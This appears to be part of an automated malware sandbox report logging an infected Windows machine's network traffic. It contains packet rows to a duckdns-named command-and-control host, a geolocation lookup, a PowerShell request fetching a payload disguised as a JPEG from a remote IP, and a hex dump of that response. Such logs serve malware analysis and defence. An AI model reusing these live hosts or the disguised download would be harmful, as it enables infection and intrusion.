                    Jul 27, 2024 13:30:08.410520077 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.410521030 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410537004 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410563946 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.410801888 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410818100 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410832882 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410836935 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.410849094 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410864115 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410865068 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.410906076 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.410954952 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410969973 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410984039 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.410999060 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411006927 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.411014080 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411027908 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411034107 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.411042929 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411057949 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411061049 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.411072969 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411088943 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.411089897 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.411118984 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.411552906 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412023067 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412056923 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412082911 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412096977 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412111998 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412126064 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412132978 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412157059 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412224054 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412239075 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412252903 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412266016 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412273884 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412281036 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412295103 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412296057 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412311077 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412327051 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412338018 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412353992 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412540913 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412558079 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412573099 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412585974 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412595034 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412601948 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412616014 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412617922 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412631035 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412645102 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412646055 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412659883 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412678003 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412681103 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412695885 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412710905 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412717104 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412727118 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412739992 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412740946 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412758112 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412770987 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.412781954 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.412802935 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413523912 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413539886 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413554907 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413573027 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413577080 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413588047 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413603067 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413605928 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413618088 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413633108 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413636923 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413647890 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413662910 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413670063 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413677931 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413691998 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413697958 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413707018 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413719893 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.413727999 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.413758993 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414222956 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414238930 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414252996 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414271116 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414287090 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414290905 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414309978 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414316893 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414324999 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414340973 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414341927 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414356947 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414370060 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414386034 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414386034 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414398909 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414401054 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414414883 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414429903 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414442062 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.414444923 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.414465904 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.415185928 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.415201902 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.415216923 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.415224075 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.415232897 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.415247917 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.415249109 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.415288925 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.416342974 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.450644970 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450691938 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450709105 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450727940 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.450803041 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450819016 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450835943 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.450841904 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450859070 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.450881004 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.451036930 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451051950 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451067924 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451069117 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.451085091 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451098919 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.451252937 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451267958 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451283932 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.451284885 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.451317072 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.501808882 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502058983 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502094984 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502105951 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502113104 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502151012 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502266884 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502281904 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502296925 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502316952 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502438068 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502453089 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502470016 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502471924 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502501965 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502644062 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502736092 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502757072 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502769947 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502772093 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502788067 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502804041 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.502809048 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.502835035 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503004074 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503019094 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503034115 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503047943 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503053904 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503062963 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503082991 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503084898 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503099918 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503114939 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503114939 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503129959 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503144026 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503145933 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503161907 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503175974 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503717899 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503734112 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503750086 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503753901 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503765106 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503777981 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503779888 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503796101 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503809929 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.503810883 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.503848076 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504112959 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504127026 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504141092 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504156113 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504163027 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504169941 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504188061 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504192114 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504206896 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504220963 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504225016 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504236937 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504251003 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504251003 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504267931 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504281044 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504281998 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504297018 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504312038 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504323006 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504327059 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.504344940 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.504973888 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:08.505007029 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:08.805993080 CEST8049734178.237.33.50192.168.2.4
                    Jul 27, 2024 13:30:08.806152105 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:30:09.839868069 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:09.845014095 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845043898 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845057011 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845088005 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845099926 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845110893 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845124960 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845125914 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:09.845125914 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:09.845135927 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845144987 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.845489979 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850065947 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850122929 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850136042 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850148916 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850212097 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.850426912 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.851082087 CEST1857649733192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:09.851139069 CEST4973318576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:21.992137909 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:21.993563890 CEST4973218576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:21.998408079 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:52.006450891 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:30:52.008332968 CEST4973218576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:30:52.016222000 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:31:22.048305988 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:31:22.049952030 CEST4973218576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:31:22.056227922 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:31:52.056225061 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:31:52.059978008 CEST4973218576192.168.2.4192.3.101.142
                    Jul 27, 2024 13:31:52.064846992 CEST1857649732192.3.101.142192.168.2.4
                    Jul 27, 2024 13:31:57.120460987 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:31:57.497565031 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:31:58.135823011 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:31:59.340537071 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:32:01.838931084 CEST4973480192.168.2.4178.237.33.50
                    Jul 27, 2024 13:32:06.730864048 CEST4973480192.168.2.4178.237.33.50
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 13:30:05.274147987 CEST5202053192.168.2.41.1.1.1
                    Jul 27, 2024 13:30:05.409154892 CEST53520201.1.1.1192.168.2.4
                    Jul 27, 2024 13:30:07.132021904 CEST6180353192.168.2.41.1.1.1
                    Jul 27, 2024 13:30:07.145117044 CEST53618031.1.1.1192.168.2.4
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 27, 2024 13:30:05.274147987 CEST192.168.2.41.1.1.10xe3eaStandard query (0)maveing.duckdns.orgA (IP address)IN (0x0001)false
                    Jul 27, 2024 13:30:07.132021904 CEST192.168.2.41.1.1.10xf42Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 27, 2024 13:30:05.409154892 CEST1.1.1.1192.168.2.40xe3eaNo error (0)maveing.duckdns.org192.3.101.142A (IP address)IN (0x0001)false
                    Jul 27, 2024 13:30:07.145117044 CEST1.1.1.1192.168.2.40xf42No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                    • 198.46.176.133
                    • 192.3.176.154
                    • geoplugin.net
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730198.46.176.133806744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    Jul 27, 2024 13:30:01.596431971 CEST79OUTGET /Upload/vbs.jpeg HTTP/1.1
                    Host: 198.46.176.133
                    Connection: Keep-Alive
                    Jul 27, 2024 13:30:02.120834112 CEST1236INHTTP/1.1 200 OK
                    Date: Sat, 27 Jul 2024 11:30:02 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                    Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                    ETag: "1d7285-61ce2d35c4b0c"
                    Accept-Ranges: bytes
                    Content-Length: 1929861
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: image/jpeg
                    Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5*sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/*Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4A
                    Jul 27, 2024 13:30:02.120898008 CEST1236INData Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04
                    Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQrXpIJI:
                    Jul 27, 2024 13:30:02.120934010 CEST1236INData Raw: 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a
                    Data Ascii: cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A13E0DoE~52>)X5OnFQM*uQMVy#o\>5$0!\DYX`
                    Jul 27, 2024 13:30:02.121208906 CEST1236INData Raw: eb 61 9b 1b 8e 59 08 20 77 ef 81 b5 2f 89 15 06 c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70
                    Data Ascii: aY w/-\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+ED
                    Jul 27, 2024 13:30:02.121242046 CEST1236INData Raw: 57 5c 80 2a 60 74 ef 64 8b 00 03 63 8e 98 1e 82 09 cb 79 72 9a da 0d d1 1c e0 55 27 3a a2 c1 88 8d 89 24 5f e9 81 f0 fd e8 19 a5 05 a4 6e 83 fc 39 a0 a4 35 58 1f 2b c0 4b 59 a2 d2 95 f3 59 5c 16 34 0a 11 c6 66 a4 fa 8d 1b 95 0c 5e 26 fe 12 6c 30
                    Data Ascii: W\*`tdcyrU':$_n95X+KYY\4f^&l0*8<KHSQ7Y3&S\p)3v'r:/>2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF
